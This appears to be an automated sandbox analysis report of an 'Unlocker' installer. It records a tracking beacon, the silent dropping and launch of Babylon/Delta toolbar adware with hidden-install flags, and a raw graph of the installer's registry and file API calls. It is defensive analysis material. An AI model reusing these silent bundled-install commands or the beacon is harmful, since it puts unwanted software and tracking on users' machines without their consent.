Feb 17, 2023 13:07:02.283214092 CET | 100 | OUT | GET /report.php?no_policy=1&lang=0&source=setup-end&stage=91&ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0&hp=1&dsp=1&tb=1&hpx=0&dspx=0&rvrt=0&excd=0&stm=2&nvs=0&dnld=100&dcnt=1&dtot=1&dlerr=200&dltm=0&dlsz=3844&dsflr=0&errurl=Setup2.zpb&hpc=1998245871&spc=1998245871&tbx=0 HTTP/1.1
                                                                                                                                                            User-Agent: Babylon
                                                                                                                                                            Host: stat.info-stream.net
                                                                                                                                                            Cache-Control: no-cache
Feb 17, 2023 13:07:02.402560949 CET | 100 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 17 Feb 2023 15:09:05 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                            Data Raw: 32 62 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a
                                                                                                                                                            Data Ascii: 2bGIF89a!,D;
Feb 17, 2023 13:07:02.402582884 CET | 100 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0



                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:13:06:34
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:1078591 bytes
                                                                                                                                                            MD5 hash:1E02D6AA4A199448719113AE3926AFB2
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:13:06:54
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\DeltaTB.exe" /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt
                                                                                                                                                            Imagebase:0x9a0000
                                                                                                                                                            File size:785904 bytes
                                                                                                                                                            MD5 hash:EB2764885565B6C01CB32E5F51F213B3
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 44%, ReversingLabs
                                                                                                                                                            Reputation:low

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:13:06:54
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe" -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:1898992 bytes
                                                                                                                                                            MD5 hash:26F6D1B6756A83DE9755A05F7C030D75
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 23%, ReversingLabs
                                                                                                                                                            Reputation:low

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:13:06:57
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache URI|http://babylon.com
                                                                                                                                                            Imagebase:0x1040000
                                                                                                                                                            File size:61952 bytes
                                                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:13:06:58
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\ielowutil.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Internet Explorer\IELowutil.exe" -PID:123
                                                                                                                                                            Imagebase:0x1260000
                                                                                                                                                            File size:221184 bytes
                                                                                                                                                            MD5 hash:D1F5C3244A69511CAC88009B71884A71
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:13:06:58
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache trkInfo|http://babylon.com
                                                                                                                                                            Imagebase:0x1040000
                                                                                                                                                            File size:61952 bytes
                                                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:6
                                                                                                                                                            Start time:13:07:00
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\setup.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\Setup.exe -latest -trkInfo=[TType:5012_7] -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt
                                                                                                                                                            Imagebase:0xee0000
                                                                                                                                                            File size:8704 bytes
                                                                                                                                                            MD5 hash:5790A04F78C61C3CAEA7DDD6F01829D2
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                            Reputation:low

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:13:07:00
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Unlocker\UnlockerCOM.dll
                                                                                                                                                            Imagebase:0x2f0000
                                                                                                                                                            File size:20992 bytes
                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:13:07:00
                                                                                                                                                            Start date:17/02/2023
                                                                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline: /s "C:\Program Files\Unlocker\UnlockerCOM.dll"
                                                                                                                                                            Imagebase:0x7ff7720a0000
                                                                                                                                                            File size:24064 bytes
                                                                                                                                                            MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language


                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:34.6%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:23.6%
                                                                                                                                                              Total number of Nodes:1242
                                                                                                                                                              Total number of Limit Nodes:59
401ae5 4063 4029f6 18 API calls 4062->4063 4064 401aec 4063->4064 4065 4029d9 18 API calls 4064->4065 4066 401af5 wsprintfA 4065->4066 4067 40288b 4066->4067 3673 402866 SendMessageA 3674 402880 InvalidateRect 3673->3674 3675 40288b 3673->3675 3674->3675 4068 4019e6 4069 4029f6 18 API calls 4068->4069 4070 4019ef ExpandEnvironmentStringsA 4069->4070 4071 401a03 4070->4071 4073 401a16 4070->4073 4072 401a08 lstrcmpA 4071->4072 4071->4073 4072->4073 3676 402267 3677 4029f6 18 API calls 3676->3677 3678 402275 3677->3678 3679 4029f6 18 API calls 3678->3679 3680 40227e 3679->3680 3681 4029f6 18 API calls 3680->3681 3682 402288 GetPrivateProfileStringA 3681->3682 4074 401c6d 4075 4029d9 18 API calls 4074->4075 4076 401c73 IsWindow 4075->4076 4077 4019d6 4076->4077 4078 4014f0 SetForegroundWindow 4079 40288b 4078->4079 4080 402172 4081 4029f6 18 API calls 4080->4081 4082 402178 4081->4082 4083 4029f6 18 API calls 4082->4083 4084 402181 4083->4084 4085 4029f6 18 API calls 4084->4085 4086 40218a 4085->4086 4087 405cd8 2 API calls 4086->4087 4088 402193 4087->4088 4089 4021a4 lstrlenA lstrlenA 4088->4089 4090 402197 4088->4090 4091 404d7b 25 API calls 4089->4091 4092 404d7b 25 API calls 4090->4092 4094 40219f 4090->4094 4093 4021e0 SHFileOperationA 4091->4093 4092->4094 4093->4090 4093->4094 4095 4021f4 4096 4021fb 4095->4096 4097 40220e 4095->4097 4098 4059ff 18 API calls 4096->4098 4099 402208 4098->4099 4100 40529e MessageBoxIndirectA 4099->4100 4100->4097 4101 4062f4 4105 405e2c 4101->4105 4102 406797 4103 405eb6 GlobalAlloc 4103->4102 4103->4105 4104 405ead GlobalFree 4104->4103 4105->4102 4105->4103 4105->4104 4105->4105 4106 405f24 GlobalFree 4105->4106 4107 405f2d GlobalAlloc 4105->4107 4106->4107 4107->4102 4107->4105 4108 4016fa 4109 4029f6 18 API calls 4108->4109 4110 401701 SearchPathA 4109->4110 4111 40171c 4110->4111 4112 4025fb 4113 402602 4112->4113 4114 40288b 4112->4114 4115 402608 FindClose 4113->4115 4115->4114 3854 40267c 3855 4029f6 18 API calls 
3854->3855 3857 40268a 3855->3857 3856 4026a0 3859 405695 2 API calls 3856->3859 3857->3856 3858 4029f6 18 API calls 3857->3858 3858->3856 3860 4026a6 3859->3860 3880 4056b4 GetFileAttributesA CreateFileA 3860->3880 3862 4026b3 3863 40275c 3862->3863 3864 4026bf GlobalAlloc 3862->3864 3865 402764 DeleteFileA 3863->3865 3866 402777 3863->3866 3867 402753 CloseHandle 3864->3867 3868 4026d8 3864->3868 3865->3866 3867->3863 3881 403080 SetFilePointer 3868->3881 3870 4026de 3871 40304e ReadFile 3870->3871 3872 4026e7 GlobalAlloc 3871->3872 3873 4026f7 3872->3873 3874 40272b WriteFile GlobalFree 3872->3874 3875 402e5b 37 API calls 3873->3875 3876 402e5b 37 API calls 3874->3876 3879 402704 3875->3879 3877 402750 3876->3877 3877->3867 3878 402722 GlobalFree 3878->3874 3879->3878 3880->3862 3881->3870 4116 4014fe 4117 401506 4116->4117 4119 401519 4116->4119 4118 4029d9 18 API calls 4117->4118 4118->4119 4120 401000 4121 401037 BeginPaint GetClientRect 4120->4121 4123 40100c DefWindowProcA 4120->4123 4124 4010f3 4121->4124 4125 401179 4123->4125 4126 401073 CreateBrushIndirect FillRect DeleteObject 4124->4126 4127 4010fc 4124->4127 4126->4124 4128 401102 CreateFontIndirectA 4127->4128 4129 401167 EndPaint 4127->4129 4128->4129 4130 401112 6 API calls 4128->4130 4129->4125 4130->4129 4131 404502 4132 404512 4131->4132 4133 40452e 4131->4133 4142 405282 GetDlgItemTextA 4132->4142 4135 404561 4133->4135 4136 404534 SHGetPathFromIDListA 4133->4136 4138 40454b SendMessageA 4136->4138 4139 404544 4136->4139 4137 40451f SendMessageA 4137->4133 4138->4135 4141 40140b 2 API calls 4139->4141 4141->4138 4142->4137 2887 402303 2888 402309 2887->2888 2904 4029f6 2888->2904 2891 4029f6 18 API calls 2892 402325 RegCreateKeyExA 2891->2892 2893 40288b 2892->2893 2894 40234f 2892->2894 2895 402367 2894->2895 2896 4029f6 18 API calls 2894->2896 2897 402373 2895->2897 2910 4029d9 2895->2910 2900 402360 lstrlenA 2896->2900 2899 40238e RegSetValueExA 2897->2899 2913 402e5b 2897->2913 2902 4023a4 
RegCloseKey 2899->2902 2900->2895 2902->2893 2905 402a02 2904->2905 2934 4059ff 2905->2934 2908 40231b 2908->2891 2911 4059ff 18 API calls 2910->2911 2912 4029ed 2911->2912 2912->2897 2915 402e71 2913->2915 2914 402e9c 2973 40304e ReadFile 2914->2973 2915->2914 2993 403080 SetFilePointer 2915->2993 2919 402fe2 2921 402fe6 2919->2921 2926 402ffe 2919->2926 2920 402eb9 GetTickCount 2930 402ecc 2920->2930 2923 40304e ReadFile 2921->2923 2922 402fcd 2922->2899 2923->2922 2924 40304e ReadFile 2924->2926 2925 40304e ReadFile 2925->2930 2926->2922 2926->2924 2927 403019 WriteFile 2926->2927 2927->2922 2927->2926 2929 402f32 GetTickCount 2929->2930 2930->2922 2930->2925 2930->2929 2931 402f5b MulDiv wsprintfA 2930->2931 2932 402f99 WriteFile 2930->2932 2975 405df9 2930->2975 2982 404d7b 2931->2982 2932->2922 2932->2930 2948 405a0c 2934->2948 2935 405c26 2936 402a23 2935->2936 2968 4059dd lstrcpynA 2935->2968 2936->2908 2952 405c3f 2936->2952 2938 405aa4 GetVersion 2938->2948 2939 405bfd lstrlenA 2939->2948 2942 4059ff 10 API calls 2942->2939 2943 405b1c GetSystemDirectoryA 2943->2948 2945 405b2f GetWindowsDirectoryA 2945->2948 2946 405c3f 5 API calls 2946->2948 2947 405ba6 lstrcatA 2947->2948 2948->2935 2948->2938 2948->2939 2948->2942 2948->2943 2948->2945 2948->2946 2948->2947 2949 405b63 SHGetSpecialFolderLocation 2948->2949 2950 4059ff 10 API calls 2948->2950 2961 4058c4 RegOpenKeyExA 2948->2961 2966 40593b wsprintfA 2948->2966 2967 4059dd lstrcpynA 2948->2967 2949->2948 2951 405b7b SHGetPathFromIDListA CoTaskMemFree 2949->2951 2950->2948 2951->2948 2953 405c4b 2952->2953 2955 405ca8 CharNextA 2953->2955 2957 405cb3 2953->2957 2959 405c96 CharNextA 2953->2959 2960 405ca3 CharNextA 2953->2960 2969 4054fb 2953->2969 2954 405cb7 CharPrevA 2954->2957 2955->2953 2955->2957 2957->2954 2958 405cd2 2957->2958 2958->2908 2959->2953 2960->2955 2962 405935 2961->2962 2963 4058f7 RegQueryValueExA 2961->2963 2962->2948 2964 405918 RegCloseKey 2963->2964 2964->2962 2966->2948 
2967->2948 2968->2936 2970 405501 2969->2970 2971 405514 2970->2971 2972 405507 CharNextA 2970->2972 2971->2953 2972->2970 2974 402ea7 2973->2974 2974->2919 2974->2920 2974->2922 2976 405e1e 2975->2976 2977 405e26 2975->2977 2976->2930 2977->2976 2978 405eb6 GlobalAlloc 2977->2978 2979 405ead GlobalFree 2977->2979 2980 405f24 GlobalFree 2977->2980 2981 405f2d GlobalAlloc 2977->2981 2978->2976 2978->2977 2979->2978 2980->2981 2981->2976 2981->2977 2984 404d96 2982->2984 2992 404e39 2982->2992 2983 404db3 lstrlenA 2986 404dc1 lstrlenA 2983->2986 2987 404ddc 2983->2987 2984->2983 2985 4059ff 18 API calls 2984->2985 2985->2983 2988 404dd3 lstrcatA 2986->2988 2986->2992 2989 404de2 SetWindowTextA 2987->2989 2990 404def 2987->2990 2988->2987 2989->2990 2991 404df5 SendMessageA SendMessageA SendMessageA 2990->2991 2990->2992 2991->2992 2992->2930 2993->2914 4143 402803 4144 4029d9 18 API calls 4143->4144 4145 402809 4144->4145 4146 40283a 4145->4146 4147 402817 4145->4147 4149 40265c 4145->4149 4148 4059ff 18 API calls 4146->4148 4146->4149 4147->4149 4151 40593b wsprintfA 4147->4151 4148->4149 4151->4149 2994 401b06 2995 401b13 2994->2995 2996 401b57 2994->2996 2999 4021fb 2995->2999 3003 401b2a 2995->3003 2997 401b80 GlobalAlloc 2996->2997 2998 401b5b 2996->2998 3000 4059ff 18 API calls 2997->3000 3012 401b9b 2998->3012 3015 4059dd lstrcpynA 2998->3015 3001 4059ff 18 API calls 2999->3001 3000->3012 3002 402208 3001->3002 3016 40529e 3002->3016 3013 4059dd lstrcpynA 3003->3013 3006 401b6d GlobalFree 3006->3012 3008 401b39 3014 4059dd lstrcpynA 3008->3014 3010 401b48 3020 4059dd lstrcpynA 3010->3020 3013->3008 3014->3010 3015->3006 3018 4052b3 3016->3018 3017 4052ff 3017->3012 3018->3017 3019 4052c7 MessageBoxIndirectA 3018->3019 3019->3017 3020->3012 4152 402506 4153 4029d9 18 API calls 4152->4153 4154 402510 4153->4154 4155 402544 ReadFile 4154->4155 4156 402588 4154->4156 4158 402598 4154->4158 4160 402586 4154->4160 4155->4154 4155->4160 4161 40593b wsprintfA 
4156->4161 4159 4025ae SetFilePointer 4158->4159 4158->4160 4159->4160 4161->4160 4162 404186 4163 404196 4162->4163 4164 4041bc 4162->4164 4165 403d8f 19 API calls 4163->4165 4166 403df6 8 API calls 4164->4166 4167 4041a3 SetDlgItemTextA 4165->4167 4168 4041c8 4166->4168 4167->4164 4169 401c8a 4170 4029d9 18 API calls 4169->4170 4171 401c91 4170->4171 4172 4029d9 18 API calls 4171->4172 4173 401c99 GetDlgItem 4172->4173 4174 4024b8 4173->4174 4174->4174 4182 401490 4183 404d7b 25 API calls 4182->4183 4184 401497 4183->4184 3582 401d95 3583 4029d9 18 API calls 3582->3583 3584 401d9b 3583->3584 3585 4029d9 18 API calls 3584->3585 3586 401da4 3585->3586 3587 401db6 EnableWindow 3586->3587 3588 401dab ShowWindow 3586->3588 3589 40288b 3587->3589 3588->3589 4185 402615 4186 402618 4185->4186 4187 402630 4185->4187 4188 402625 FindNextFileA 4186->4188 4188->4187 4189 40266f 4188->4189 4191 4059dd lstrcpynA 4189->4191 4191->4187 4192 401595 4193 4029f6 18 API calls 4192->4193 4194 40159c SetFileAttributesA 4193->4194 4195 4015ae 4194->4195 4196 401e95 4197 4029f6 18 API calls 4196->4197 4198 401e9c 4197->4198 4199 405cd8 2 API calls 4198->4199 4200 401ea2 4199->4200 4201 401eb4 4200->4201 4203 40593b wsprintfA 4200->4203 4203->4201 4204 401696 4205 4029f6 18 API calls 4204->4205 4206 40169c GetFullPathNameA 4205->4206 4207 4016b3 4206->4207 4213 4016d4 4206->4213 4210 405cd8 2 API calls 4207->4210 4207->4213 4208 4016e8 GetShortPathNameA 4209 40288b 4208->4209 4211 4016c4 4210->4211 4211->4213 4214 4059dd lstrcpynA 4211->4214 4213->4208 4213->4209 4214->4213 3622 401e1b 3623 4029f6 18 API calls 3622->3623 3624 401e21 3623->3624 3625 404d7b 25 API calls 3624->3625 3626 401e2b 3625->3626 3627 40523d 2 API calls 3626->3627 3631 401e31 3627->3631 3628 401e87 CloseHandle 3630 40265c 3628->3630 3629 401e50 WaitForSingleObject 3629->3631 3632 401e5e GetExitCodeProcess 3629->3632 3631->3628 3631->3629 3631->3630 3633 405d38 2 API calls 3631->3633 3634 401e70 3632->3634 3635 
401e7b 3632->3635 3633->3629 3638 40593b wsprintfA 3634->3638 3635->3628 3637 401e79 3635->3637 3637->3628 3638->3637 4215 401d1b GetDC GetDeviceCaps 4216 4029d9 18 API calls 4215->4216 4217 401d37 MulDiv 4216->4217 4218 4029d9 18 API calls 4217->4218 4219 401d4c 4218->4219 4220 4059ff 18 API calls 4219->4220 4221 401d85 CreateFontIndirectA 4220->4221 4222 4024b8 4221->4222 4230 40249c 4231 4029f6 18 API calls 4230->4231 4232 4024a3 4231->4232 4235 4056b4 GetFileAttributesA CreateFileA 4232->4235 4234 4024af 4235->4234 3639 402020 3640 4029f6 18 API calls 3639->3640 3641 402027 3640->3641 3642 4029f6 18 API calls 3641->3642 3643 402031 3642->3643 3644 4029f6 18 API calls 3643->3644 3645 40203a 3644->3645 3646 4029f6 18 API calls 3645->3646 3647 402044 3646->3647 3648 4029f6 18 API calls 3647->3648 3649 40204e 3648->3649 3650 402062 CoCreateInstance 3649->3650 3651 4029f6 18 API calls 3649->3651 3654 402081 3650->3654 3655 402137 3650->3655 3651->3650 3652 401423 25 API calls 3653 402169 3652->3653 3654->3655 3656 402116 MultiByteToWideChar 3654->3656 3655->3652 3655->3653 3656->3655 3657 401721 3658 4029f6 18 API calls 3657->3658 3659 401728 3658->3659 3660 4056e3 2 API calls 3659->3660 3661 40172f 3660->3661 3662 4056e3 2 API calls 3661->3662 3662->3661 4236 401922 4237 4029f6 18 API calls 4236->4237 4238 401929 lstrlenA 4237->4238 4239 4024b8 4238->4239 3663 402223 3664 40222b 3663->3664 3667 402231 3663->3667 3665 4029f6 18 API calls 3664->3665 3665->3667 3666 402241 3669 40224f 3666->3669 3670 4029f6 18 API calls 3666->3670 3667->3666 3668 4029f6 18 API calls 3667->3668 3668->3666 3671 4029f6 18 API calls 3669->3671 3670->3669 3672 402258 WritePrivateProfileStringA 3671->3672 4240 403ea3 lstrcpynA lstrlenA 4241 401ca5 4242 4029d9 18 API calls 4241->4242 4243 401cb5 SetWindowLongA 4242->4243 4244 40288b 4243->4244 4245 401a26 4246 4029d9 18 API calls 4245->4246 4247 401a2c 4246->4247 4248 4029d9 18 API calls 4247->4248 4249 4019d6 4248->4249 3683 402427 3693 
402b00 3683->3693 3685 402431 3686 4029d9 18 API calls 3685->3686 3687 40243a 3686->3687 3688 402451 RegEnumKeyA 3687->3688 3689 40245d RegEnumValueA 3687->3689 3690 40265c 3687->3690 3691 402476 RegCloseKey 3688->3691 3689->3690 3689->3691 3691->3690 3694 4029f6 18 API calls 3693->3694 3695 402b19 3694->3695 3696 402b27 RegOpenKeyExA 3695->3696 3696->3685 3697 4022a7 3698 4022d7 3697->3698 3699 4022ac 3697->3699 3701 4029f6 18 API calls 3698->3701 3700 402b00 19 API calls 3699->3700 3702 4022b3 3700->3702 3703 4022de 3701->3703 3704 4029f6 18 API calls 3702->3704 3708 4022f6 3702->3708 3709 402a36 RegOpenKeyExA 3703->3709 3706 4022c4 RegDeleteValueA RegCloseKey 3704->3706 3706->3708 3712 402a61 3709->3712 3717 4022f4 3709->3717 3710 402a87 RegEnumKeyA 3711 402a99 RegCloseKey 3710->3711 3710->3712 3714 405cff 3 API calls 3711->3714 3712->3710 3712->3711 3713 402abe RegCloseKey 3712->3713 3715 402a36 3 API calls 3712->3715 3713->3717 3716 402aa9 3714->3716 3715->3712 3716->3717 3718 402ad9 RegDeleteKeyA 3716->3718 3717->3708 3718->3717 4250 405fa8 4252 405e2c 4250->4252 4251 406797 4252->4251 4253 405eb6 GlobalAlloc 4252->4253 4254 405ead GlobalFree 4252->4254 4255 405f24 GlobalFree 4252->4255 4256 405f2d GlobalAlloc 4252->4256 4253->4251 4253->4252 4254->4253 4255->4256 4256->4251 4256->4252 3719 401bad 3720 4029d9 18 API calls 3719->3720 3721 401bb4 3720->3721 3722 4029d9 18 API calls 3721->3722 3723 401bbe 3722->3723 3724 401bce 3723->3724 3725 4029f6 18 API calls 3723->3725 3726 4029f6 18 API calls 3724->3726 3731 401bde 3724->3731 3725->3724 3726->3731 3727 401be9 3729 4029d9 18 API calls 3727->3729 3728 401c2d 3730 4029f6 18 API calls 3728->3730 3732 401bee 3729->3732 3733 401c32 3730->3733 3731->3727 3731->3728 3734 4029d9 18 API calls 3732->3734 3735 4029f6 18 API calls 3733->3735 3736 401bf7 3734->3736 3737 401c3b FindWindowExA 3735->3737 3738 401c1d SendMessageA 3736->3738 3739 401bff SendMessageTimeoutA 3736->3739 3740 401c59 3737->3740 3738->3740 
3739->3740 4257 4023af 4258 402b00 19 API calls 4257->4258 4259 4023b9 4258->4259 4260 4029f6 18 API calls 4259->4260 4261 4023c2 4260->4261 4262 4023cc RegQueryValueExA 4261->4262 4265 40265c 4261->4265 4263 4023ec 4262->4263 4267 4023f2 RegCloseKey 4262->4267 4263->4267 4268 40593b wsprintfA 4263->4268 4267->4265 4268->4267 3741 4015b3 3742 4029f6 18 API calls 3741->3742 3743 4015ba 3742->3743 3744 405564 4 API calls 3743->3744 3755 4015c2 3744->3755 3745 40160a 3746 40162d 3745->3746 3747 40160f 3745->3747 3753 401423 25 API calls 3746->3753 3749 401423 25 API calls 3747->3749 3748 4054fb CharNextA 3750 4015d0 CreateDirectoryA 3748->3750 3752 401616 3749->3752 3751 4015e5 GetLastError 3750->3751 3750->3755 3754 4015f2 GetFileAttributesA 3751->3754 3751->3755 3759 4059dd lstrcpynA 3752->3759 3758 402169 3753->3758 3754->3755 3755->3745 3755->3748 3757 401621 SetCurrentDirectoryA 3757->3758 3759->3757 3760 401734 3761 4029f6 18 API calls 3760->3761 3762 40173b 3761->3762 3763 401761 3762->3763 3764 401759 3762->3764 3800 4059dd lstrcpynA 3763->3800 3799 4059dd lstrcpynA 3764->3799 3767 40175f 3770 405c3f 5 API calls 3767->3770 3768 40176c 3769 4054d0 3 API calls 3768->3769 3771 401772 lstrcatA 3769->3771 3777 40177e 3770->3777 3771->3767 3772 405cd8 2 API calls 3772->3777 3773 405695 2 API calls 3773->3777 3775 401795 CompareFileTime 3775->3777 3776 401859 3778 404d7b 25 API calls 3776->3778 3777->3772 3777->3773 3777->3775 3777->3776 3779 4059dd lstrcpynA 3777->3779 3786 4059ff 18 API calls 3777->3786 3794 40529e MessageBoxIndirectA 3777->3794 3797 401830 3777->3797 3798 4056b4 GetFileAttributesA CreateFileA 3777->3798 3780 401863 3778->3780 3779->3777 3783 402e5b 37 API calls 3780->3783 3781 404d7b 25 API calls 3782 401845 3781->3782 3784 401876 3783->3784 3785 40188a SetFileTime 3784->3785 3787 40189c FindCloseChangeNotification 3784->3787 3785->3787 3786->3777 3787->3782 3788 4018ad 3787->3788 3789 4018b2 3788->3789 3790 4018c5 3788->3790 3792 4059ff 18 API 
calls 3789->3792 3791 4059ff 18 API calls 3790->3791 3793 4018cd 3791->3793 3795 4018ba lstrcatA 3792->3795 3796 40529e MessageBoxIndirectA 3793->3796 3794->3777 3795->3793 3796->3782 3797->3781 3797->3782 3798->3777 3799->3767 3800->3768 4276 401634 4277 4029f6 18 API calls 4276->4277 4278 40163a 4277->4278 4279 405cd8 2 API calls 4278->4279 4280 401640 4279->4280 4281 401934 4282 4029d9 18 API calls 4281->4282 4283 40193b 4282->4283 4284 4029d9 18 API calls 4283->4284 4285 401945 4284->4285 4286 4029f6 18 API calls 4285->4286 4287 40194e 4286->4287 4288 401961 lstrlenA 4287->4288 4289 40199c 4287->4289 4290 40196b 4288->4290 4290->4289 4294 4059dd lstrcpynA 4290->4294 4292 401985 4292->4289 4293 401992 lstrlenA 4292->4293 4293->4289 4294->4292 4295 4019b5 4296 4029f6 18 API calls 4295->4296 4297 4019bc 4296->4297 4298 4029f6 18 API calls 4297->4298 4299 4019c5 4298->4299 4300 4019cc lstrcmpiA 4299->4300 4301 4019de lstrcmpA 4299->4301 4302 4019d2 4300->4302 4301->4302 4303 4014b7 4304 4014bd 4303->4304 4305 401389 2 API calls 4304->4305 4306 4014c5 4305->4306 3801 404eb9 3802 405065 3801->3802 3803 404eda GetDlgItem GetDlgItem GetDlgItem 3801->3803 3805 405096 3802->3805 3806 40506e GetDlgItem CreateThread CloseHandle 3802->3806 3847 403dc4 SendMessageA 3803->3847 3807 4050c1 3805->3807 3809 4050e3 3805->3809 3810 4050ad ShowWindow ShowWindow 3805->3810 3806->3805 3853 404e4d 5 API calls 3806->3853 3811 40511f 3807->3811 3813 4050d2 3807->3813 3814 4050f8 ShowWindow 3807->3814 3808 404f4b 3816 404f52 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3808->3816 3815 403df6 8 API calls 3809->3815 3849 403dc4 SendMessageA 3810->3849 3811->3809 3819 40512a SendMessageA 3811->3819 3850 403d68 3813->3850 3822 405118 3814->3822 3823 40510a 3814->3823 3821 4050f1 3815->3821 3817 404fc1 3816->3817 3818 404fa5 SendMessageA SendMessageA 3816->3818 3824 404fd4 3817->3824 3825 404fc6 SendMessageA 3817->3825 3818->3817 3819->3821 3826 405143 CreatePopupMenu 3819->3826 
